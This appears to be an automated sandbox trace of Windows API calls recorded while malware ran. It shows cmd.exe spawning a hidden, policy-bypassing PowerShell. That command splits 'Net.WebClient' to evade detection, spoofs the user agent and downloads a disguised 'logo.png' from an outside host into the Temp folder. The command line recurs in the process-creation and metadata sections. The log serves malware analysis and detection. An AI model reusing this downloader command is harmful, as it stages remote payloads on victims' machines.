	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0148.707] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0148.708] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0148.709] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0148.710] SetErrorMode (uMode=0x0) returned 0x0
	[0148.710] SetErrorMode (uMode=0x1) returned 0x0
	[0148.710] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2cb640, lpFilePart=0x14f150 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x14f150*="Documents") returned 0x1b
	[0148.710] SetErrorMode (uMode=0x0) returned 0x1
	[0148.710] GetProcessHeap () returned 0x2b0000
	[0148.710] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cb630, Size=0x66) returned 0x2cb630
	[0148.710] GetProcessHeap () returned 0x2b0000
	[0148.711] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2cb630) returned 0x66
	[0148.711] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0148.711] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0148.711] GetProcessHeap () returned 0x2b0000
	[0148.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x170) returned 0x2b1c30
	[0148.711] GetProcessHeap () returned 0x2b0000
	[0148.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2d0) returned 0x2cb6b0
	[0148.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0148.712] GetProcessHeap () returned 0x2b0000
	[0148.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe8) returned 0x2cb840
	[0148.712] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.713] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0148.717] FindClose (in: hFindFile=0x2ca480 | out: hFindFile=0x2ca480) returned 1
	[0148.717] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0148.718] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0148.718] GetConsoleTitleW (in: lpConsoleTitle=0x14f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0148.775] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f1c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f188 | out: lpAttributeList=0x14f1c8, lpSize=0x14f188) returned 1
	[0148.775] UpdateProcThreadAttribute (in: lpAttributeList=0x14f1c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f178, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f1c8, lpPreviousValue=0x0) returned 1
	[0148.775] GetStartupInfoW (in: lpStartupInfo=0x14f2e0 | out: lpStartupInfo=0x14f2e0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0148.776] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0148.777] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x14f200*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f1b0 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x14f1b0*(hProcess=0x54, hThread=0x50, dwProcessId=0xda4, dwThreadId=0xda8)) returned 1
	[0148.781] CloseHandle (hObject=0x50) returned 1
	[0148.781] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0148.781] GetProcessHeap () returned 0x2b0000
	[0148.781] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb10 | out: hHeap=0x2b0000) returned 1
	[0148.781] GetEnvironmentStringsW () returned 0x2cb8d0*
	[0148.781] GetProcessHeap () returned 0x2b0000
	[0148.781] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb2c) returned 0x2cc820
	[0148.781] FreeEnvironmentStringsW (penv=0x2cb8d0) returned 1
	[0148.781] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "47"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x54d00000"
	os_pid = "0xda4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "46"
	os_parent_pid = "0xd88"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 367
	os_tid = 0xda8

	[0150.249] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0151.134] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0151.524] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0151.525] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0151.525] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0151.525] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0151.965] GetVersionExW (in: lpVersionInformation=0x12de90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12de90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0151.967] GetVersionExW (in: lpVersionInformation=0x12de90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12de90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0151.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0151.979] GetVersionExW (in: lpVersionInformation=0x12dc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0151.979] SetErrorMode (uMode=0x1) returned 0x1
	[0151.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dd60 | out: lpFileInformation=0x12dd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0151.981] SetErrorMode (uMode=0x1) returned 0x1
	[0151.984] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dfd0 | out: lpdwHandle=0x12dfd0) returned 0x94c
	[0151.985] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e97370 | out: lpData=0x2e97370) returned 1
	[0151.987] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12df48, puLen=0x12df40 | out: lplpBuffer=0x12df48*=0x2e9740c, puLen=0x12df40) returned 1
	[0151.990] lstrlenW (lpString="䅁") returned 1
	[0151.997] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e974e8, puLen=0x12deb0) returned 1
	[0151.998] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0152.000] CoTaskMemAlloc (cb=0x2e) returned 0x3d2d60
	[0152.000] lstrcpyW (in: lpString1=0x3d2d60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0152.001] CoTaskMemFree (pv=0x3d2d60) 
	[0152.001] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e9753c, puLen=0x12deb0) returned 1
	[0152.001] lstrlenW (lpString="System.Management.Automation") returned 28
	[0152.001] CoTaskMemAlloc (cb=0x3c) returned 0x377810
	[0152.001] lstrcpyW (in: lpString1=0x377810, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0152.001] CoTaskMemFree (pv=0x377810) 
	[0152.001] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e97598, puLen=0x12deb0) returned 1
	[0152.001] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0152.001] CoTaskMemAlloc (cb=0x20) returned 0x3d0e80
	[0152.001] lstrcpyW (in: lpString1=0x3d0e80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0152.001] CoTaskMemFree (pv=0x3d0e80) 
	[0152.001] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e975d8, puLen=0x12deb0) returned 1
	[0152.001] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0152.001] CoTaskMemAlloc (cb=0x44) returned 0x377810
	[0152.001] lstrcpyW (in: lpString1=0x377810, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0152.001] CoTaskMemFree (pv=0x377810) 
	[0152.001] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e97640, puLen=0x12deb0) returned 1
	[0152.001] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0152.001] CoTaskMemAlloc (cb=0x76) returned 0x367ed0
	[0152.001] lstrcpyW (in: lpString1=0x367ed0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0152.001] CoTaskMemFree (pv=0x367ed0) 
	[0152.001] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e976dc, puLen=0x12deb0) returned 1
	[0152.001] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0152.001] CoTaskMemAlloc (cb=0x44) returned 0x377810
	[0152.002] lstrcpyW (in: lpString1=0x377810, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0152.002] CoTaskMemFree (pv=0x377810) 
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e97740, puLen=0x12deb0) returned 1
	[0152.002] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0152.002] CoTaskMemAlloc (cb=0x58) returned 0x322170
	[0152.002] lstrcpyW (in: lpString1=0x322170, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0152.002] CoTaskMemFree (pv=0x322170) 
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e977bc, puLen=0x12deb0) returned 1
	[0152.002] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0152.002] CoTaskMemAlloc (cb=0x20) returned 0x3d0e80
	[0152.002] lstrcpyW (in: lpString1=0x3d0e80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0152.002] CoTaskMemFree (pv=0x3d0e80) 
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2e97464, puLen=0x12deb0) returned 1
	[0152.002] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0152.002] CoTaskMemAlloc (cb=0x66) returned 0x3d6cf0
	[0152.002] lstrcpyW (in: lpString1=0x3d6cf0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0152.002] CoTaskMemFree (pv=0x3d6cf0) 
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x0, puLen=0x12deb0) returned 0
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x0, puLen=0x12deb0) returned 0
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x0, puLen=0x12deb0) returned 0
	[0152.002] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12de88, puLen=0x12de80 | out: lplpBuffer=0x12de88*=0x2e9740c, puLen=0x12de80) returned 1
	[0152.003] CoTaskMemAlloc (cb=0x204) returned 0x362fb0
	[0152.003] VerLanguageNameW (in: wLang=0x0, szLang=0x362fb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0152.004] CoTaskMemFree (pv=0x362fb0) 
	[0152.004] VerQueryValueW (in: pBlock=0x2e97370, lpSubBlock="\\", lplpBuffer=0x12ded8, puLen=0x12ded0 | out: lplpBuffer=0x12ded8*=0x2e97398, puLen=0x12ded0) returned 1
	[0152.046] GetCurrentProcessId () returned 0xda4
	[0152.060] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12ce00 | out: lpLuid=0x12ce00*(LowPart=0x14, HighPart=0)) returned 1
	[0152.062] GetCurrentProcess () returned 0xffffffffffffffff
	[0152.063] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12ce20 | out: TokenHandle=0x12ce20*=0x2ec) returned 1
	[0152.063] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2e9abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0152.064] CloseHandle (hObject=0x2ec) returned 1
	[0152.068] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xda4) returned 0x2ec
	[0152.076] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2e9ac50, cb=0x200, lpcbNeeded=0x12de38 | out: lphModule=0x2e9ac50, lpcbNeeded=0x12de38) returned 1
	[0152.078] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2e9aec0, cb=0x18 | out: lpmodinfo=0x2e9aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0152.079] CoTaskMemAlloc (cb=0x804) returned 0x3dac70
	[0152.079] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x3dac70, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0152.079] CoTaskMemFree (pv=0x3dac70) 
	[0152.080] CoTaskMemAlloc (cb=0x804) returned 0x3dac70
	[0152.080] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x3dac70, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0152.080] CoTaskMemFree (pv=0x3dac70) 
	[0152.081] CloseHandle (hObject=0x2ec) returned 1
	[0152.096] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xda4) returned 0x2ec
	[0152.097] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x12df68 | out: lpExitCode=0x12df68*=0x103) returned 1
	[0152.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e9b088, Length=0x20000, ResultLength=0x12df30 | out: SystemInformation=0x12e9b088, ResultLength=0x12df30*=0x137a0) returned 0x0
	[0152.122] EnumWindows (lpEnumFunc=0x2d866ac, lParam=0x0) returned 1
	[0152.122] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x4a0
	[0152.123] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12dc90 | out: lpdwProcessId=0x12dc90) returned 0x334
